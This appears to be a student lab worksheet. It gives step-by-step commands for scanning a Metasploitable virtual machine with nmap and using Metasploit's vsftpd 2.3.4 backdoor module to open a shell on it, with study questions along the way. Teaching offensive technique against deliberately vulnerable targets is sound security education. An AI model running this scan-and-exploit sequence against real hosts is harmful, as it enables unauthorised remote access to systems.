Ensure that both the Kali and the metasploitable machines are powered on and on the same network. Verify connectivity between them by using the ping command.
-
Run nmap against the metasploitable machine using the following command.
-
sudo nmap -sV <metasploitable IP> -vvv
-
Make note of open ports and services.
-
Make note of what port VSFTPD service is running.
-
-
Start the Kali PostgreSQL service (which Metasploit uses as its backend) by running the following command.
sudo systemctl start postgresql
-
Initialize the Metasploit PostgreSQL database by running the following command.
sudo msfdb init
-
Launch msfconsole
msfconsole
-
Check the database connectivity using the following command.
db_status
(it should say connected).
-
Explore the search command by typing "help search".
-
Search for an VSFTPD exploit.
search type:exploit name:vsftp
-
How many exploits were found?
-
Select the found exploit by typing the following command.
use exploit/unix/ftp/vsftpd_234_backdoor
-
Review the options of the exploit by typing the following command.
show options
-
Set the remote host and ports by using the following commands.
-
set RHOSTS <Metasploitable IP Address>
-
set RPORT <VSFTPD port number>
-
-
Verify what payloads are available by using the "show payloads" command.
-
How many payloads are available?
-
Run the exploit by using the following command.
exploit
-
Once the shell is opened type
hostname
, followed byifconfig
. Include screenshot of output.